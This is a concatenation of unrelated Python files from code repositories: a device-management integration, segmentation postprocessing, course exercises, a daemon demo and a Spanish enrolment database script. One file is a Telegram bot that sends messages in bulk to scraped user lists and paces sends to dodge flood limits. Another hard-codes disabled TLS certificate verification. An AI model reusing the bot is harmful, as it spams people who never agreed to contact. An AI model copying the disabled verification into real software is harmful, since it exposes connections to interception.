CONSTANT_STRING["SERIAL_NUM"]: device.get(CONSTANT_STRING["SERIAL_NUM"].replace(' ', ''), ''),
CONSTANT_STRING["MAC_ADDR"]: device.get('MacAddress', ''),
CONSTANT_STRING["COMPLIANCE_STATUS"]: device.get('ComplianceStatus', ''),
"Compromised Status": compromised,
CONSTANT_STRING["USER_EMAIL"]: device.get('UserEmailAddress', ''),
CONSTANT_STRING["LAST_SEEN"]: last_seen
})
hr = tableToMarkdown("Device(s)", hr_devices_list,
[CONSTANT_STRING['DEVICE_FRIENDLY'], "UUID", "Platform", "Model", "Ownership",
CONSTANT_STRING["SERIAL_NUM"],
CONSTANT_STRING["MAC_ADDR"], CONSTANT_STRING["COMPLIANCE_STATUS"], "Compromised Status",
CONSTANT_STRING["USER_EMAIL"],
CONSTANT_STRING["LAST_SEEN"]],
removeNull=True)
return remove_empty_elements_for_context(context), hr
def validate_and_parameterize_devices_search_arguments(args: dict) -> dict:
"""
Convert arguments to parameter for command vmwuem-devices-search command, raise ValueError with
appropriate message
:type args: ``dict``
:param args: dictionary returned by demisto.args()
:rtype: ``dict``
:return: dictionary parameters for http request
"""
params = {
"user": args.get("user"),
"model": args.get("model"),
"platform": args.get("platform"),
"lgid": args.get("lgid"),
"orderby": args.get("order_by"),
}
params = remove_empty_elements(params)
if args.get("ownership"):
ownership = args.get("ownership", '').lower() # type: ignore
is_present_in_list(ownership, list(ARG_TO_PARAM_OWNERSHIP.keys()), MESSAGES['INVALID_OWNERSHIP'])
params['ownership'] = ARG_TO_PARAM_OWNERSHIP[ownership]
# Validate date-time params
if args.get("last_seen"):
params['lastseen'] = arg_to_datetime(args.get("last_seen"), "last_seen").strftime(DATE_FORMAT) # type: ignore
# Validate paging and sorting params
if args.get("page_size"):
page_size = arg_to_number(args.get("page_size", "10"), "page_size")
if page_size < 1: # type: ignore
raise ValueError(MESSAGES['INVALID_PAGE_SIZE'])
params['pagesize'] = page_size
if args.get("page"):
page = arg_to_number(args.get("page"), "page")
if page < 0: # type: ignore
raise ValueError(MESSAGES['INVALID_PAGE'])
params['page'] = page
if args.get("sort_order"):
sort_order = args.get("sort_order").upper() # type: ignore
is_present_in_list(sort_order, ["ASC", "DESC"], MESSAGES['INVALID_SORT_ORDER'])
params['sortorder'] = sort_order
return params
def prepare_context_and_hr_for_devices_get(response: dict) -> Tuple[dict, str]:
"""
Prepare entry context and human readable for device get command
:type response: ``dict``
:param response: dictionary json response from get api
:rtype: ``Tuple[dict, str]``
:return: tuple of dict entry context and str human readable
"""
enrollment_info = response.get('enrollmentInfo', {})
compliance = enrollment_info.get('compliant', '')
if isinstance(compliance, str):
compliance = "Unknown"
else:
compliance = "Compliant" if compliance else "Non-Compliant"
last_seen = enrollment_info.get('lastSeenTimestamp', '')
if last_seen:
last_seen = dateparser.parse(last_seen).strftime(READABLE_DATE_FORMAT) # type: ignore
hr_dict = {
CONSTANT_STRING["DEVICE_FRIENDLY"]: response.get('friendlyName', ''),
"UUID": response.get('uuid', ''),
"Platform": response.get('platformInfo', {}).get('platformName', ''),
"Model": response.get('platformInfo', {}).get('modelName'),
"Ownership": enrollment_info.get('ownership', ''),
CONSTANT_STRING["SERIAL_NUM"]: response.get('serialNumber', ''),
CONSTANT_STRING["MAC_ADDR"]: response.get('macAddress', ''),
CONSTANT_STRING["COMPLIANCE_STATUS"]: compliance,
CONSTANT_STRING["USER_EMAIL"]: enrollment_info.get('userEmailAddress', ''),
CONSTANT_STRING["LAST_SEEN"]: last_seen
}
hr = tableToMarkdown("Device", hr_dict,
[CONSTANT_STRING["DEVICE_FRIENDLY"], "UUID", "Platform", "Model", "Ownership",
CONSTANT_STRING["SERIAL_NUM"],
CONSTANT_STRING["MAC_ADDR"], CONSTANT_STRING["COMPLIANCE_STATUS"],
CONSTANT_STRING["USER_EMAIL"], CONSTANT_STRING["LAST_SEEN"]],
removeNull=True)
return remove_empty_elements_for_context(camel_to_pascal(response)), hr
''' COMMAND FUNCTIONS '''
def test_module(client: Client) -> str:
"""Tests API connectivity and authentication'
Returning 'ok' indicates that the integration works like it is supposed to.
Connection to the service is successful.
Raises exceptions if something goes wrong.
:type client: ``Client``
:param client: client to use
:return: 'ok' if test passed, anything else will fail the test.
:rtype: ``str``
"""
client.http_request(method='GET', url_suffix='devices/search')
return 'ok'
def vmwuem_devices_search_command(client: Client, args: dict) -> CommandResults:
"""
Searches devices using the search API according to the arguments
:type client: ``Client``
:param client: client to use
:type args: ``dict``
:param args: arguments from demisto.args
:return: Command results containing the outputs and context.
:rtype: ``CommandResults``
"""
# Prepare parameters for request
args = remove_empty_elements(args)
params = validate_and_parameterize_devices_search_arguments(args)
# Make the call.
response = client.http_request(method='GET', url_suffix='devices/search', params=params)
if not response.text:
return CommandResults(readable_output=MESSAGES['NO_RECORDS_FOUND'].format('device'))
# Prepare context and human readable
json_response = response.json()
outputs, readable_output = prepare_context_and_hr_for_devices_search(json_response)
return CommandResults(outputs_prefix='VMwareWorkspaceONEUEM.Device', outputs_key_field="Uuid", outputs=outputs,
readable_output=readable_output, raw_response=json_response)
def vmwuem_device_get_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves a device using get device endpoint according to given uuid.
:type client: ``Client``
:param client: client to use
:type args: ``dict``
:param args: dictionary returned by demisto.args
:return: configured command result object containing the outputs and hr.
:rtype: ``CommandResults``
"""
# Validate uuid argument.
uuid = validate_uuid_argument(args)
response = client.http_request(method='GET', url_suffix=f'devices/{uuid}')
# Prepare context and human readable
json_response = response.json()
outputs, readable_output = prepare_context_and_hr_for_devices_get(json_response)
return CommandResults(outputs_prefix='VMwareWorkspaceONEUEM.Device', outputs_key_field="Uuid", outputs=outputs,
readable_output=readable_output, raw_response=json_response)
def vmwuem_device_os_updates_list_command(client: Client, args: dict) -> CommandResults:
"""
Retrieves a list of all available OS and software updates for the specified device.
:type client: ``Client``
:param client: client to use
:type args: ``dict``
:param args: dictionary returned by demisto.args
:return: configured command result object containing the outputs and hr.
:rtype: ``CommandResults``
"""
# validating arguments
uuid = validate_uuid_argument(args)
response = client.http_request(method='GET', url_suffix=f'devices/{uuid}/osupdate')
result = response.json()
if not result.get('OSUpdateList', []):
return CommandResults(readable_output=MESSAGES['NO_RECORDS_FOUND'].format("osupdate(s)"))
# prepare context and human readable
context_data, hr_output = prepare_context_hr_os_updates_list_command(result, uuid)
return CommandResults(
outputs_prefix='VMwareWorkspaceONEUEM.OSUpdate',
outputs_key_field='Uuid',
outputs=context_data,
readable_output=hr_output,
raw_response=result
)
''' MAIN FUNCTION '''
def main() -> None:
"""
main function, parses params and runs command functions
"""
dict_param = demisto.params()
dict_args = demisto.args()
strip_args(dict_args)
command = demisto.command()
# get the username and password for authentication
username = dict_param.get('credentials')['identifier'].strip()
password = dict_param.get('credentials')['password']
api_key = dict_param['aw_tenant_code']
# get the service API url
base_url = urljoin(dict_param['url'], '/API/mdm/')
verify_certificate = False
proxy = dict_param.get('proxy', False)
demisto.debug(f'{LOGGING_INTEGRATION_NAME} Command being called is {command}')
try:
headers: Dict = {"aw-tenant-code": "{}".format(api_key),
"Accept": "application/json;version={}".format(API_VERSION)}
client = Client(
base_url=base_url,
verify=verify_certificate,
headers=headers,
proxy=proxy,
username=username,
password=password
)
commands = {
'vmwuem-devices-search': vmwuem_devices_search_command,
'vmwuem-device-get': vmwuem_device_get_command,
'vmwuem-device-os-updates-list': vmwuem_device_os_updates_list_command
}
if command == 'test-module':
# This is the call made when pressing the integration Test button.
return_results(test_module(client))
elif command in commands:
return_results(commands[command](client, dict_args))
# Log exceptions and return errors
except Exception as e:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute {demisto.command()} command.\nError:\n{str(e)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 37.180301 | 118 | 0.654932 |
4521a736d606c08fd30161ae6f150ff1deee4a2a
| 270 |
py
|
Python
|
9.3.py
|
RonaldZhao/NowCoder
|
935af39835a98efc14157e20df1e3458e02b9803
|
[
"MIT"
] | null | null | null |
9.3.py
|
RonaldZhao/NowCoder
|
935af39835a98efc14157e20df1e3458e02b9803
|
[
"MIT"
] | null | null | null |
9.3.py
|
RonaldZhao/NowCoder
|
935af39835a98efc14157e20df1e3458e02b9803
|
[
"MIT"
] | null | null | null |
class StandInLine:
def getWays(self, n, a, b):
if n <= 1:
return [0, 0]
a1, a2 = 1, 1
if n > 2:
for i in range(1, n + 1):
a1 *= i
a1 /= 2
a2 = a1 * 2 / n
return [a1, a2]
| 22.5 | 37 | 0.337037 |
18e559d014db29138b4a757f61fd1f6fd6722f0e
| 5,818 |
py
|
Python
|
research/cv/Auto-DeepLab/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/Auto-DeepLab/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/Auto-DeepLab/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Evaluate mIOU and Pixel accuracy"""
import os
import argparse
import ast
import cv2
from PIL import Image
import numpy as np
from src.utils.utils import fast_hist
from build_mindrecord import encode_segmap
def decode_segmap(pred):
"""decode_segmap"""
mask = np.uint8(pred)
num_classes = 19
valid_classes = [7, 8, 11, 12, 13, 17, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 31, 32, 33]
rank_classes = range(num_classes)
class_map = dict(zip(rank_classes, valid_classes))
for _rank in rank_classes:
mask[mask == _rank] = class_map[_rank]
return mask
def get_color(npimg):
"""get_color"""
cityspallete = [
128, 64, 128,
244, 35, 232,
70, 70, 70,
102, 102, 156,
190, 153, 153,
153, 153, 153,
250, 170, 30,
220, 220, 0,
107, 142, 35,
152, 251, 152,
0, 130, 180,
220, 20, 60,
255, 0, 0,
0, 0, 142,
0, 0, 70,
0, 60, 100,
0, 80, 100,
0, 0, 230,
119, 11, 32,
]
img = Image.fromarray(npimg.astype('uint8'), "P")
img.putpalette(cityspallete)
out_img = np.array(img.convert('RGB'))
return out_img
def infer(args):
"""infer"""
images_base = os.path.join(args.dataset_path, 'leftImg8bit/val')
annotations_base = os.path.join(args.dataset_path, 'gtFine/val')
hist = np.zeros((args.num_classes, args.num_classes))
for root, _, files in os.walk(images_base):
for filename in files:
if filename.endswith('.png'):
print("start infer ", filename)
file_name = filename.split('.')[0]
prob_file = os.path.join(args.result_path, file_name + "_0.bin")
flipped_prob_file = os.path.join(args.result_path, file_name + "_flip_0.bin")
prob = np.fromfile(prob_file, dtype=np.float32)
prob = prob.reshape(1, 19, 1024, 2048)
flipped_prob = np.fromfile(flipped_prob_file, dtype=np.float32).reshape(1, 19, 1024, 2048)
pred = (prob + flipped_prob[:, :, :, ::-1])
pred = pred.argmax(1).astype(np.uint8)
folder_name = root.split(os.sep)[-1]
if args.cal_acc:
gtFine_name = filename.replace('leftImg8bit', 'gtFine_labelIds')
label_file = os.path.join(annotations_base, folder_name, gtFine_name)
label = np.array(cv2.imread(label_file, cv2.IMREAD_GRAYSCALE), np.uint8)
label = encode_segmap(label, 255)
hist = hist + fast_hist(pred.copy().flatten(), label.flatten(), args.num_classes)
if args.save_img:
# labelIds image
predImg_name = filename.replace('leftImg8bit', 'predImg_labelIds')
predImg_root = os.path.join(args.output_path, folder_name)
predImg_file = os.path.join(predImg_root, predImg_name)
if not os.path.isdir(predImg_root):
os.makedirs(predImg_root)
decode_pred = decode_segmap(pred.copy().squeeze(0))
cv2.imwrite(predImg_file, decode_pred, [cv2.IMWRITE_PNG_COMPRESSION])
# colorful segmentation image
colorImg_name = filename.replace('leftImg8bit', 'predImg_colorful')
colorImg_root = args.output_path
colorImg_root = os.path.join(colorImg_root.replace('output', 'output_img'), folder_name)
colorImg_file = os.path.join(colorImg_root, colorImg_name)
if not os.path.isdir(colorImg_root):
os.makedirs(colorImg_root)
color_pred = get_color(pred.copy().squeeze(0))
color_pred = cv2.cvtColor(np.asarray(color_pred), cv2.COLOR_RGB2BGR)
cv2.imwrite(colorImg_file, color_pred, [cv2.IMWRITE_PNG_COMPRESSION])
if args.cal_acc:
miou = np.diag(hist) / (hist.sum(0) + hist.sum(1) - np.diag(hist) + 1e-10)
miou = round(np.nanmean(miou) * 100, 2)
print("mIOU = ", miou, "%")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Auto-DeepLab Inference post-process")
parser.add_argument("--dataset_path", type=str, default="", help="dataset path for evaluation")
parser.add_argument("--num_classes", type=int, default=19)
parser.add_argument("--device_id", type=int, default=0, help="Device id, default: 0.")
parser.add_argument("--result_path", type=str, default="", help="Prob bin file path.")
parser.add_argument("--output_path", type=str, default="", help="Output path.")
parser.add_argument("--save_img", type=ast.literal_eval, default=True, help="Whether save pics after inference.")
parser.add_argument("--cal_acc", type=ast.literal_eval, default=True, help="Calculate mIOU or not.")
Args = parser.parse_args()
infer(Args)
| 42.15942 | 118 | 0.588175 |
7a073bef29cb1ccbf97f4c94c853d1f67572392e
| 3,247 |
py
|
Python
|
TeleGram-Scraper-master/smsbot.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
TeleGram-Scraper-master/smsbot.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
TeleGram-Scraper-master/smsbot.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
#!/bin/env python3
from telethon.sync import TelegramClient
from telethon.tl.types import InputPeerUser
from telethon.errors.rpcerrorlist import PeerFloodError
import configparser
import os, sys
import csv
import random
import time
re="\033[1;31m"
gr="\033[1;32m"
cy="\033[1;36m"
SLEEP_TIME = 30
class main():
def banner():
print(f"""
{re}╔╦╗{cy}┌─┐┬ ┌─┐{re}╔═╗ ╔═╗{cy}┌─┐┬─┐┌─┐┌─┐┌─┐┬─┐
{re} ║ {cy}├┤ │ ├┤ {re}║ ╦ ╚═╗{cy}│ ├┬┘├─┤├─┘├┤ ├┬┘
{re} ╩ {cy}└─┘┴─┘└─┘{re}╚═╝ ╚═╝{cy}└─┘┴└─┴ ┴┴ └─┘┴└─
version : 3.1
youtube.com/theunknon
""")
def send_sms():
try:
cpass = configparser.RawConfigParser()
cpass.read('config.data')
api_id = cpass['cred']['id']
api_hash = cpass['cred']['hash']
phone = cpass['cred']['phone']
except KeyError:
os.system('clear')
main.banner()
print(re+"[!] run python3 setup.py first !!\n")
sys.exit(1)
client = TelegramClient(phone, api_id, api_hash)
client.connect()
if not client.is_user_authorized():
client.send_code_request(phone)
os.system('clear')
main.banner()
client.sign_in(phone, input(gr+'[+] Enter the code: '+re))
os.system('clear')
main.banner()
input_file = sys.argv[1]
users = []
with open(input_file, encoding='UTF-8') as f:
rows = csv.reader(f,delimiter=",",lineterminator="\n")
next(rows, None)
for row in rows:
user = {}
user['username'] = row[0]
user['id'] = int(row[1])
user['access_hash'] = int(row[2])
user['name'] = row[3]
users.append(user)
print(gr+"[1] send sms by user ID\n[2] send sms by username ")
mode = int(input(gr+"Input : "+re))
message = input(gr+"[+] Enter Your Message : "+re)
for user in users:
if mode == 2:
if user['username'] == "":
continue
receiver = client.get_input_entity(user['username'])
elif mode == 1:
receiver = InputPeerUser(user['id'],user['access_hash'])
else:
print(re+"[!] Invalid Mode. Exiting.")
client.disconnect()
sys.exit()
try:
print(gr+"[+] Sending Message to:", user['name'])
client.send_message(receiver, message.format(user['name']))
print(gr+"[+] Waiting {} seconds".format(SLEEP_TIME))
time.sleep(SLEEP_TIME)
except PeerFloodError:
print(re+"[!] Getting Flood Error from telegram. \n[!] Script is stopping now. \n[!] Please try again after some time.")
client.disconnect()
sys.exit()
except Exception as e:
print(re+"[!] Error:", e)
print(re+"[!] Trying to continue...")
continue
client.disconnect()
print("Done. Message sent to all users.")
main.send_sms()
| 32.47 | 136 | 0.483523 |
833476dc810de79fadb03a8f9dfae5f6eae658e1
| 1,256 |
py
|
Python
|
exercises/es/exc_03_12.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/es/exc_03_12.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/es/exc_03_12.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
import json
from spacy.lang.es import Spanish
from spacy.tokens import Span
from spacy.matcher import PhraseMatcher
with open("exercises/es/countries.json", encoding="utf8") as f:
COUNTRIES = json.loads(f.read())
with open("exercises/es/capitals.json", encoding="utf8") as f:
CAPITALS = json.loads(f.read())
nlp = Spanish()
matcher = PhraseMatcher(nlp.vocab)
matcher.add("COUNTRY", None, *list(nlp.pipe(COUNTRIES)))
def countries_component(doc):
# Crea un Span de entidades con el label "LOC" para todos los resultados
matches = matcher(doc)
doc.ents = [____(____, ____, ____, label=____) for match_id, start, end in matches]
return doc
# Añade el componente al pipeline
____.____(____)
print(nlp.pipe_names)
# El getter que busca el texto del span en un diccionario de ciudades
# capitales de países
get_capital = lambda span: CAPITALS.get(span.text)
# Registra la extensión de atributo del Span, "capital", con el
# getter get_capital
____.____(____, ____)
# Procesa el texto e imprime en pantalla el texto de la entidad,
# el label y los atributos "capital"
doc = nlp(
"La República Checa podría ayudar a la República Eslovaca "
"a proteger su espacio aéreo"
)
print([(____, ____, ____) for ent in doc.ents])
| 29.209302 | 87 | 0.730892 |
369361e8d9c9c019690280f0b36bcfd3b0fe8096
| 1,268 |
py
|
Python
|
python/fork.py
|
immortal/sandbox
|
761645c11399b15f624104accdf39688faf96a04
|
[
"BSD-3-Clause"
] | null | null | null |
python/fork.py
|
immortal/sandbox
|
761645c11399b15f624104accdf39688faf96a04
|
[
"BSD-3-Clause"
] | 1 |
2020-06-25T03:59:50.000Z
|
2020-06-25T03:59:50.000Z
|
python/fork.py
|
immortal/sandbox
|
761645c11399b15f624104accdf39688faf96a04
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import os
import sys
def main():
""" A demo daemon main routine, write a datestamp to
/tmp/daemon-log every 10 seconds.
"""
import time
f = open("/tmp/daemon-log", "w")
while 1:
f.write('%s\n' % time.ctime(time.time()))
f.flush()
time.sleep(10)
if __name__ == "__main__":
# do the UNIX double-fork magic, see Stevens' "Advanced
# Programming in the UNIX Environment" for details (ISBN 0201563177)
try:
pid = os.fork()
if pid > 0:
print "going to exit pid: %d" % pid
# exit first parent
sys.exit(0)
except OSError, e:
print >>sys.stderr, "fork #1 failed: %d (%s)" % (e.errno, e.strerror)
sys.exit(1)
print "second start pid: %d" % os.getpid()
# decouple from parent environment
os.chdir("/")
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent, print eventual PID before
print "Daemon PID %d" % pid
sys.exit(0)
except OSError, e:
print >>sys.stderr, "fork #2 failed: %d (%s)" % (e.errno, e.strerror)
sys.exit(1)
# start the daemon main loop
main()
| 25.36 | 77 | 0.544953 |
7fea5d689efce097a541b6dfb58072f4b35ca691
| 327 |
py
|
Python
|
1_Datentypen/03_tuples/_01_unpack_and_move_in.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
1_Datentypen/03_tuples/_01_unpack_and_move_in.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
1_Datentypen/03_tuples/_01_unpack_and_move_in.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
# tuples are defined as:
# create a tuple, grab a value.
# show them
# can also assign on a single line:
# Konkretes Beispiel mit Datum
# You'll find this often in loops (remember numerical for-in loops):
# Immutabel heißt nicht zwingend unveränderlich
## Verweis auf eine Liste (diese lässt sich intern ändern)
| 13.625 | 68 | 0.724771 |
43fda1474c164b8c211acc5573e242ad8ee11c88
| 33,499 |
py
|
Python
|
FuncionesSQL.py
|
Miguel-331/Proyecto-SUN
|
104afd03e05616a297fbda976d377f49a1f905ec
|
[
"Unlicense"
] | null | null | null |
FuncionesSQL.py
|
Miguel-331/Proyecto-SUN
|
104afd03e05616a297fbda976d377f49a1f905ec
|
[
"Unlicense"
] | null | null | null |
FuncionesSQL.py
|
Miguel-331/Proyecto-SUN
|
104afd03e05616a297fbda976d377f49a1f905ec
|
[
"Unlicense"
] | null | null | null |
import Graficador as graficar
import os
import FuncionesGraficas as graficos
# En esta funcion se añande los estdiantes a la base de datos
def AñadirEstudiante(lector,database):
graficar.Simple()
while True:
try:
a = input("Digite el nombre del nuevo estudiante: ")
b = input("Digite el apellido del nuevo estudiante: ")
c = input("Digite el ID del nuevo estudiante: ")
d = int(input("Digite el codigo de la carrera del nuevo estudiante: "))
e = input("Digite el estado del estudiante(Matriculado, Graduado, Perdida de cupo): ")
f = int(input("Digite el P.A.P.A del estudiante: "))
nuevo_usuario = (a,b,c,d,e,f)
lector.execute("INSERT INTO ESTUDIANTES(NOMBRE, APELLIDO, ID, CODPDE, ESTADO, PAPA) VALUES(?,?,?,?,?,?)",nuevo_usuario)
database.commit()
break
except:
print("Ocurrido un error, por favor digite denuevo.")
os.system('cls')
# En esta funcion se añande los profesores a la base de datos
def AñadirProfesor(lector,database):
graficar.Simple()
while True:
try:
a = input("Digite el nombre del nuevo docente: ")
b = input("Digite el apellido del nuevo docente: ")
c = input("Digite el ID del nuevo docente: ")
d = "Docente"
nuevo_docente = (a,b,c,d)
lector.execute("INSERT INTO PROFESORES(NOMBRE, APELLIDO, ID, ESTADO) VALUES(?,?,?,?)",nuevo_docente)
database.commit()
break
except:
print("Ocurrido un error, por favor digite denuevo.")
os.system('cls')
# En esta funcion se añande las materias a la base de datos
def AñadirMateria(lector,database):
graficar.Simple()
while True:
a = input("Digite el codigo de la nueva materia: ")
b = input("Digite el nombre de la nueva materia: ")
c = input("Digite el codigo de la facultad a la que pertenece la materia: ")
x = input("Digite el codigo del departamento que la dicta: ")
d = int(input("Digite los creditos de la nueva materia: "))
f = ""
while True:
e = input("Si tiene una materia prerequisito digite el codigo de esta, si no digite 0: ")
lector.execute("SELECT * FROM MATERIAS WHERE CODIGO = ? ",(e,))
if (len(lector.fetchall()) == 1):
f = e
lector.execute("SELECT NOMBRE FROM MATERIAS WHERE CODIGO = ?",(e,))
e = lector.fetchall()
e = ConvertirString(e)
break
elif (e == "0"):
f = e
e = "Sin prerequisito"
break
else:
print("Materia no existente")
if ("Y" == input("¿Desea ver las materias existentes Y||N?: ")):
Mostrar(lector,"MATERIAS")
else:
pass
break
nueva_materia = (a,b,c,x,d,e,f)
lector.execute("INSERT INTO MATERIAS(CODIGO, NOMBRE, CODFACULTAD, CODDEPA, CREDITOS, PREREQ, CODPREREQ) VALUES(?,?,?,?,?,?,?)",nueva_materia)
database.commit()
os.system('cls')
# Con esta funcion se le asignan las materias a los profesores
def AsignarMaterias(lector,database):
graficar.Simple()
while True:
a = input("Digite el codigo de la materia a asignar: ")
lector.execute("SELECT * FROM MATERIAS WHERE CODIGO = ?",(a,))
if (len(lector.fetchall()) == 0):
print("Materia no existente")
if ("Y" == input("¿Desea ver las materias existentes Y||N?: ")):
Mostrar(lector,"MATERIAS")
else:
break
else:
while True:
e = input("Digite el ID del docente: ")
lector.execute("SELECT * FROM PROFESORES WHERE ID = ?",(e,))
if(lector.fetchall()==0):
print("Docente no encontrado")
if ("Y" == input("¿Desea ver los docentes disponibles Y||N?: ")):
Mostrar(lector,"PROFESORES")
lector.execute("SELECT ESTADO FROM PROFESORES WHERE ID = ?",(e,))
t = lector.fetchall()
t = ConvertirString(t)
if (t != "Docente"):
input("El profesor no esta dictando clases por el momento")
break
else:
while True:
lector.execute("SELECT NOMBRE FROM MATERIAS WHERE CODIGO = ?",(a,))
b = lector.fetchall()
b = ConvertirString(b)
lector.execute("SELECT NOMBRE FROM PROFESORES WHERE ID = ?",(e,))
c = lector.fetchall()
c = ConvertirString(c)
lector.execute("SELECT APELLIDO FROM PROFESORES WHERE ID = ?",(e,))
d = lector.fetchall()
d = ConvertirString(d)
f = int(input("Digite la hora de inicio de la clase (24h): "))
g = int(input("Digite la durancion de la clase: "))
h = input("Digite las iniciales de los dias de clase (L,M,C,J,V): ")
i = int(input("Digite el numero de cupos disponibles: "))
lector.execute("SELECT * FROM MATERIASDOC WHERE ID = ? AND DIAS = ?",(e,h,))
nueva_asignacion = (a,b,c,d,e,f,g,h,i)
lector.execute('''INSERT INTO MATERIASDOC(CODIGO, NOMBRE, NOMDOC,
APDOC, ID, HORARIOINIT, HORASCLASE, DIAS,
CUPOS) VALUES(?,?,?,?,?,?,?,?,?)''',nueva_asignacion)
database.commit()
break
break
break
os.system('cls')
# Con esta funcion los estudiantes inscriben materias
def InscribirMaterias(lector,database):
graficar.Simple()
while True:
a = input("Digite el codigo de la materia a inscribir: ")
lector.execute("SELECT * FROM MATERIASDOC WHERE CODIGO = ?",(a,))
if (len(lector.fetchall()) == 0):
print("Materia no existente")
if ("Y" == input("¿Desea ver las materias existentes Y||N?: ")):
Mostrar(lector,"MATERIASDOC")
lector.execute("SELECT CUPOS FROM MATERIASDOC WHERE CODIGO = ? AND CUPOS != 0",(a,))
if (len(lector.fetchall()) == 0):
input("No hay cupos disponibles para esta materia")
break
else:
while True:
c = input("Digite el ID del estudiante: ")
lector.execute("SELECT * FROM ESTUDIANTES WHERE ID = ?",(c,))
if(len(lector.fetchall()) == 0):
print("Estudiante no encontrado")
if ("Y" == input("¿Desea ver los estudiantes registrados Y||N?: ")):
Mostrar(lector,"ESTUDIANTES")
lector.execute("SELECT ESTADO FROM ESTUDIANTES WHERE ID = ?",(c,))
t = lector.fetchall()
t = ConvertirString(t)
if(t != "Matriculado"):
input("El estudiante no esta en condicion de inscribir materias")
break
lector.execute("SELECT CODPREREQ FROM MATERIAS WHERE CODIGO = ?",(a,))
z = lector.fetchall()
z = ConvertirString(z)
if (z != "0"):
lector.execute("SELECT * FROM MATERIASEST WHERE CODIGO = ? AND IDEST = ? AND ESTATUS == 'Aprobado'",(z,c,))
y = lector.fetchall()
y = ConvertirLista(y)
if (z != "0" and z not in y):
input("El estudiante no cumple con el prerequisito solicitado")
break
else:
prereq = True
if (z == "0" or prereq == True):
while True:
try:
lector.execute("SELECT NOMBRE FROM MATERIAS WHERE CODIGO = ?",(a,))
b = lector.fetchall()
b = ConvertirString(b)
lector.execute("SELECT NOMBRE FROM ESTUDIANTES WHERE ID = ?",(c,))
d = lector.fetchall()
d = ConvertirString(d)
lector.execute("SELECT APELLIDO FROM ESTUDIANTES WHERE ID = ?",(c,))
e = lector.fetchall()
e = ConvertirString(e)
lector.execute("SELECT ID FROM MATERIASDOC WHERE CODIGO = ?",(a,))
g = lector.fetchall()
g = ConvertirString(g)
lector.execute("SELECT NOMDOC FROM MATERIASDOC WHERE CODIGO = ?",(a,))
h = lector.fetchall()
h = ConvertirString(h)
lector.execute("SELECT APDOC FROM MATERIASDOC WHERE CODIGO = ?",(a,))
i = lector.fetchall()
i = ConvertirString(i)
lector.execute("SELECT HORARIOINIT FROM MATERIASDOC WHERE CODIGO = ?",(a,))
j = lector.fetchall()
j = ConvertirNum(j)
lector.execute("SELECT HORASCLASE FROM MATERIASDOC WHERE CODIGO = ?",(a,))
k = lector.fetchall()
k = ConvertirNum(k)
lector.execute("SELECT DIAS FROM MATERIASDOC WHERE CODIGO = ?",(a,))
l = lector.fetchall()
l = ConvertirString(l)
m = "Cursando"
n = 0
nueva_asignacion = (a,b,c,d,e,g,h,i,j,k,l,m,n)
lector.execute('''INSERT INTO MATERIASEST(CODIGO, NOMBRE, IDEST,
NOMEST, APEST,IDDOC,
NOMDOC, APDOC, HORARIOINIT,
HORASCLASE, DIAS, ESTATUS, CALIFICACIÓN) VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?)''',nueva_asignacion)
lector.execute("SELECT CUPOS FROM MATERIASDOC WHERE ID = ?",(g,))
o = lector.fetchall()
o = ConvertirNum(o)
o = o-1
lector.execute("UPDATE MATERIASDOC SET CUPOS = ? WHERE ID = ?",(o,g,))
database.commit()
break
except:
print("Ocurrido un error, digite denuevo porfavor.")
break
break
os.system('cls')
